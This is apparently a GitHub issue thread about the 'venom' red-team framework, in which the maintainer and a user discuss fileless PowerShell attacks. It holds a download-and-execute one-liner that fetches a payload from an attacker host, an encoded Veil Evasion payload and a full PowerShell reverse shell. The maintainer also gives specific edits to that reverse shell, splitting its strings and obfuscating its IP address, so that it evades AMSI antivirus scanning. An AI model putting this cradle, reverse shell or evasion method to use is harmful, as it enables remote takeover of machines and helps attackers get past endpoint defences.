How does Process Injection work?

[Vedant-Bhalgama]

Hi, Nice framework, Really useful for Red Teaming purposes, Had a question... The file less attacks are getting injected in a remote process? if so, can i know how?

[r00t-3xp10it]

The 'FileLess' function of venom explained

venom creates a 'crandler.BAT' to download and execute 'payload.ps1' on target 'ram' ...
Thats means that payload.ps1 does NOT touch target disk = FileLess execution ...

The Process used is cmd.exe (If we execute the crandler.BAT) <-- Parent process
and then powershell.exe (used to load\execute payload.ps1 on ram) <-- child Process

The 'FileLess' technic its achieved by using powershell ComObject WinHttpRequest API

'ComObject WinHttpRequest' will take care of download payload.ps1 into 'RAM' and 'IEX' takes care of is execution...

powershell -W 1 $proxy=new-object -com WinHttp.WinHttpRequest.5.1;$proxy.open('GET','http://<LHOST>/<PAYLOADNAME>.ps1',$false);$proxy.send();iex $proxy.responseText;

Download/Execution (LolBin)

For more onelinner crandle downloaders take a look at this article

[Vedant-Bhalgama]

Oh! Got it! Last question, Wanted to ask that this kind of remote memory injection, can it be done in Python? Is there anything in venom related to that? if so, can i see the source code of it and maybe you can explain a bit about it?

[Vedant-Bhalgama]

Also, Here is a payload generated from Veil Evasion, It's a powershell payload, I wanted to decode the base64 string, And check what is going on, But i am not able to do so, Any help over here?

%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"zVZtb9s2EP7uX3EQOFRqLEV+iZdEMLDUadasdZrFTtpNMAZaom3WFKlQVGLX9X/fyZbf0i9FPwyDAUs83vG5l+eOIo/Qht+sSngpxHWSKm1sa8q0ZKJR92IhLGcAaT4UPILMUIMPNjO4D9fS3BoND1ybnIoLIVRklzKRXsSxZllWhZxLA/Fzj39l5WK01sWjlOzP0534VivDIuMEP+1LRzNqWH+Cj3jny3p9YYzmw9ywPacMjaZrz7bKKNNm6/1WfEs1TRhibY1XWBjClaDjfc012nWMYVi/VcI3c8PCwYDc9G/7msos4aZdrb1ungb7otAftP1Z7U2w1c9YpGT80uRQurUiUl1EEXrcJiMqMhb09XxBeiqaMtO+Yc/ux+EXzCzcMOOtpVn5tMN9WRn3FU24mA/OzzEoplHhWelpNfzeuigfql2OMTmH+0UtVaREqXEfp05QOuR1lJTojf0qz7xUKeFJk3pKj19Va/WGE4QPiseDjXKPydjeT9VLhTsWMf7EDnWWSK9ostjLi9E5WwZE57KvDBVtP7hS+i2NJja5ljGbAZdwUJGm73nNxsBZ7Gy2b6/rJ62jtR2eOeI6M32esLa9l+vLgokotGtnvl+t4c9f/cLNxnsu4yI1JnKcIvNdLgRfFzizw3vMfas5sHeYNd/3UbO30ghWPHV7grEU3AxO1iVH/CIt/6Oalx79YNE32uuqH7L9O6Vt5V/q7UCFypj9s2x40Ww/SogKH4H93zEBXNgxENwxgxNwlYZttA4sKqYgR4yD3rp407l8e/X7u+s/3n/o3ny8/fOu179/+PT5r7/pMIrZaDzhX6YikSp9xDPzp+fZ/KuPJWqetH49PbO8vupMqL7Qms5tpzLKZVQMQYhs8uQsQDOT4zi27RCHJI4xIE+HFvANuoxmuWab7Li9PMFY8gR+ARxmvg8ue4SzurPcnW5gQUaF91ZQ87zGt5HCGRtNXLU6AveO2kDi0B4z42K5YpWAm9AZT/BUEnsfmBybiTNYBqV/ZBTsnc5gAalWRa5gEdLC0QGZIRz+HQH5ZxkA0hFdmKH3GV5KJS4sbIlVLhd3K1zHk3glIeWWewDjBaDHYBOORCMcXGGg1cS3oyNk0wSRTECmBWCMCCwAKANEE7Gi4hT1skJhUngkAig4hjnPHKzuJuuogbDlwjp7+nxvYZjrFmX6iUfsVmFZulTSMdNIuELKdIdpw0cce4Q9UMHj1a3WoUIM8XZEzMWmWxJc7NG6N88MS7zi+E9s2BGcSRNUSOK9w/uP6dVksa08Y9pFPGmsKlhd9RW5TY+bno/+qyRFsKHAiLu967fQ8moBfMJmUM8Z3PQdC1tZIug4gM29CCQt0pB4l+pZCkVj7CFqWxNj0uz8+Lh2VvdqrVOv5tXPT/1T/5hIC5wKUWiE7rjFaEJqsGTI9CUbcclXBSKP4N7g/Q4WojfqFrgSV1lKIwYryVVZygzclGaZmei8QmZtos7PD75//CpJS7pV/VkD+xQfTR9HV5mtu1wa7FNvNWVVWtYl87pUZxMqsCgdlc5tklbBr0K4/qrA3p9hG+GiUbcdpwpbkCI0NNn/7CkmC5mtR0zRbio3rswFcubgyiiHx2mr6fvlfFz+Cw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

[r00t-3xp10it]

1º - i dont know any method to do it (fileless) with python ...

[powershell] Encode base64 string

$Text = "This is a secret and should be hidden"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
write-Host "EncodedString: $EncodedText"

[powershell] Decode base64 string

$EncodedText = "VABoAGkAcwAgAGkAcwAgAGEAIABzAGUAYwByAGUAdAAgAGEAbgBkACAAcwBoAG8AdQBsAGQAIABiAGUAIABoAGkAZABkAGUAbgA="
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
Write-Host "DecodedString: $DecodedText"

[Vedant-Bhalgama]

Thanks for the help, I noticed that the main fileless powershell reverse shell code uses this kind of code $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() I wonder that it is not getting detected? Because when I try Invoke-Obfuscation on this reverse shell code, It gets detected by AMSI https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

[r00t-3xp10it]

yes its detected by amsi ...

NOTES: "10.10.10.10",80 and $sendback + "PS " + (pwd).Path + "> " strings are beeing flagged for sure! Also, using Invoke-Obfuscation (by @danielbohannon) it flaggs detection also (its a project created to help BLUE TEAMS to figth obfucation technics) so manual obfuscation its the key this days!

change the the follow cmdline

$sendback2 = $sendback + "PS " + (pwd).Path + "> "

By this one and try it again!

$sendback2 = $sendback + "PS Prompt > "

Remmenber to obfuscate Net.Sockets.TCPClient("10.10.10.10",80) <-- ip address also!

$myObfuscation = "10."+"10.10"+".10" -Join ''; blabblabla ; Net.Sockets.TCPClient("$myObfuscation",80)

Read this article about obfuscation as a method to bypass amsi string detection!

[Vedant-Bhalgama]

Alright! Thank you for your help sir!